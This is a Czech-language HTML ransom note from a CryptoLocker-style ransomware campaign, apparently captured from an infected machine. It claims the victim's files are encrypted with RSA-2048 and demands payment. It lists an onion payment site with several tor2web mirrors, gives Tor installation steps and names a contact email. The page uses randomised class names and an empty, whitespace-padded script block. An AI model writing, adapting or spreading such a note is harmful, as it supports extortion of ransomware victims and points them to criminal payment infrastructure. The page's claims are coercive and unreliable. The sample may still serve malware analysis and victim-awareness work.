<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
	<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
	<title>D&#366;LE&#381;IT&#201;</title>	
<style type="text/css">
* {
	margin:					0;
	padding:				0;
}

body {
	font-size:				10pt;
	font-family:			Trebuchet MS;
	width:					100%;
	background-color:		#f5f5f5;
}

a {
	color:					#0097F2;
}

.e0u9l03g {
	font-size:				22pt;
	text-align:				center;
	font-weight:			bold;
	margin:					25px auto 25px auto;
}

.hcfrcijs {
	width:					766px;
	background-color:		#ffffff;
	padding:				15px;
	text-align:				left;
	margin:					25px auto 25px auto;
	border:					1px solid #000000;
	border-radius:			4pt;
	-webkit-border-radius:	4pt;
	-moz-border-radius:		4pt;
}

.gbxj5f4jg5hh6 {
	width:					775px;
	margin:					25px auto 25px auto;
	padding:				10px;
	background:				#cbe7f9;
	border:					1px solid #000000;
	border-radius:			4px;
	-moz-border-radius:		4px;
	-webkit-border-radius:	4px;	
	text-align:				center;
	font-size:				20px;
}

.gbxj5f4jg5hh6:hover {
	background:				#A4D8F7;
}

.m1w210j4awj29 {
	color:					#000000;
}

.p2nudkei {
	width:					750px;
	margin:					25px auto 25px auto;
	padding:				16px;
	border:					8px solid #ffffff;
	background:				#ebebeb;
}

.n2gojxu7fw4iy422 {
	background:	#ffffff;
	padding:	8px;
	margin-top:	16px;
}

.zmh8o3abynw {
	font-size:				12pt;
	color:					#0097F2;
	text-decoration:		none;
}

.ewv9cjsae0p {
	padding:				8px 0px 8px 0px;
	font-size:				14px;
}

</style>

<script type="text/javascript">
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        

</script>

</head>
<body>
<div class="e0u9l03g">
	<p style="color:#ff0000">VAROV&#193;N&#205;</p>
	jsme &#353;ifrov&#225;n&#237; soubor&#367; s CryptoLocker
</div>

<div class="hcfrcijs">
Va&#353;e d&#367;le&#382;it&#233; soubory (v&#269;etn&#283; t&#283;ch, na s&#237;&#357;ov&#233; disky, USB, atd): fotky, videa, dokumenty, atd byly za&#353;ifrov&#225;ny s na&#353;&#237;m CryptoLocker virem. Jedin&#253; zp&#367;sob, jak obnovit sv&#233; soubory, je n&#225;m zaplatit. V opa&#269;n&#233;m p&#345;&#237;pad&#283; dojde ke ztr&#225;t&#283; soubor&#367;.
<br/><br/>
<b>Pozor:</b> Odstran&#283;n&#237; CryptoLocker neobnov&#237; p&#345;&#237;stup k &#353;ifrovan&#253;m soubor&#367;m.
</div>
<div class="gbxj5f4jg5hh6">
	<a class="m1w210j4awj29" href="http://tisoyhcp2y52ioyk.connect2tor.org/buy.php?uyvwyi" target="_blank">Klikn&#283;te zde platit za soubory zotaven&#237;</a>
</div>

<div class="p2nudkei">
	<h2>&#268;asto kladen&#233; dotazy</h2>
	
	<div class="n2gojxu7fw4iy422">
		<a href="javascript:d899abo9x6('kcoqpcte','db6qkwlrt');" id="kcoqpcte" class="zmh8o3abynw">[-] Co se stalo s m&#253;mi soubory?</a>
		<p class="ewv9cjsae0p">Pochopen&#237; probl&#233;mu</p>
		<div id="db6qkwlrt" style="display:block;">
			Va&#353;e d&#367;le&#382;it&#233; soubory: fotky, videa, dokumenty apod byly za&#353;ifrov&#225;ny s na&#353;&#237;m CryptoLocker virem. Tento virus vyu&#382;&#237;v&#225; velmi siln&#253; &#353;ifrovac&#237; algoritmus - RSA-2048. Poru&#353;en&#237; RSA-2048 &#353;ifrovac&#237;m algoritmu nen&#237; mo&#382;n&#233; bez de&#353;ifrovac&#237; kl&#237;&#269;.
		</div>
	</div>
	
	<div class="n2gojxu7fw4iy422">
		<a href="javascript:d899abo9x6('oz2acmuar6nsj0ha','v44y9g5z12lsvj');" id="oz2acmuar6nsj0ha" class="zmh8o3abynw">[-] Jak mohu obnovit sv&#233; soubory?</a>
		<p class="ewv9cjsae0p">Jedin&#253;m zp&#367;sobem, jak obnovit soubory</p>
		<div id="v44y9g5z12lsvj" style="display:block;">
			Soubory jsou nyn&#237; nepou&#382;iteln&#253; a ne&#269;iteln&#253;, m&#367;&#382;ete ov&#283;&#345;it, &#382;e se sna&#382;&#237; otev&#345;&#237;t. Jedin&#253; zp&#367;sob, jak je obnovit je pou&#382;&#237;t n&#225;&#353; de&#353;ifrov&#225;n&#237; software. M&#367;&#382;ete si koupit tento de&#353;ifrov&#225;n&#237; na <a href="http://tisoyhcp2y52ioyk.connect2tor.org/buy.php?uyvwyi" target="_blank">na&#353;ich webov&#253;ch str&#225;nk&#225;ch</a>.
		</div>
	</div>
	
	<div class="n2gojxu7fw4iy422">
		<a href="javascript:d899abo9x6('vmn68hh0o5t','eaiv3n02w');" id="vmn68hh0o5t" class="zmh8o3abynw">[-] Co m&#225;m d&#283;lat d&#225;l?</a>
		<p class="ewv9cjsae0p">Koupit de&#353;ifrov&#225;n&#237;</p>
		<div id="eaiv3n02w" style="display:block;">
			M&#283;li byste <a href="http://tisoyhcp2y52ioyk.connect2tor.org/buy.php?uyvwyi" target="_blank">nav&#353;t&#237;vit na&#353;e webov&#233; str&#225;nky</a> a <a href="http://tisoyhcp2y52ioyk.connect2tor.org/buy.php?uyvwyi" target="_blank">koupit de&#353;ifrov&#225;n&#237;</a> pro va&#353;e PC.
		</div>
	</div>
	
	<div class="n2gojxu7fw4iy422">
		<a href="javascript:d899abo9x6('fwi9hb41ozob','xtnxhsrpy');" id="fwi9hb41ozob" class="zmh8o3abynw">[-] Nemohu z&#237;skat p&#345;&#237;stup na va&#353;e webov&#233; str&#225;nky, co m&#225;m d&#283;lat?</a>
		<p class="ewv9cjsae0p">P&#345;&#237;stupem na webov&#233; str&#225;nky pomoc&#237; zrcadla</p>
		<div id="xtnxhsrpy" style="display:block;">
			Na&#353;e webov&#233; str&#225;nky by m&#283;ly b&#253;t p&#345;&#237;stupn&#233; z jednoho z t&#283;chto odkaz&#367;:<br>
			<a href="http://tisoyhcp2y52ioyk.connect2tor.org/buy.php?uyvwyi" target="_blank">http://tisoyhcp2y52ioyk.connect2tor.org/buy.php?uyvwyi</a><br>
<a href="http://tisoyhcp2y52ioyk.door2tor.org/buy.php?uyvwyi" target="_blank">http://tisoyhcp2y52ioyk.door2tor.org/buy.php?uyvwyi</a><br>
<a href="http://tisoyhcp2y52ioyk.tor2web.org/buy.php?uyvwyi" target="_blank">http://tisoyhcp2y52ioyk.tor2web.org/buy.php?uyvwyi</a><br>
<a href="http://tisoyhcp2y52ioyk.onion.cab/buy.php?uyvwyi" target="_blank">http://tisoyhcp2y52ioyk.onion.cab/buy.php?uyvwyi</a><br>

			<a href="http://tisoyhcp2y52ioyk.onion/buy.php?uyvwyi" target="_blank">http://tisoyhcp2y52ioyk.onion/buy.php?uyvwyi</a> (pomoc&#237; prohl&#237;&#382;e&#269;e TOR)<br>
			<br/>
			Pokud z jak&#253;chkoliv d&#367;vod&#367; nejsou dostupn&#233; tyto adresy, pros&#237;m, postupujte podle pokyn&#367; nebo <a href="http://www.deepdotweb.com/how-to-access-onion-sites/" target="_blank">&#269;t&#283;te n&#225;vod</a><br/>
			<br/>
			1. St&#225;hnout a nainstalovat TOR-prohl&#237;&#382;e&#269;e: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br/>
			2. Po &#250;sp&#283;&#353;n&#233; instalaci, spus&#357;te prohl&#237;&#382;e&#269; a vy&#269;kejte na inicializaci<br/>
			3. Zadejte do adresn&#237;ho &#345;&#225;dku: http://tisoyhcp2y52ioyk.onion/buy.php?uyvwyi<br/>
			4. P&#345;&#237;stup na na&#353;ich webov&#253;ch str&#225;nk&#225;ch<br/>
			<br/>
			<strong>Tak&#233; n&#225;s m&#367;&#382;ete kontaktovat prost&#345;ednictv&#237;m e-mailu:</strong> <a href="mailto:decrypthelp@mail15.com">decrypthelp@mail15.com</a>
		</div>
	</div>
</div>

</body>
</html>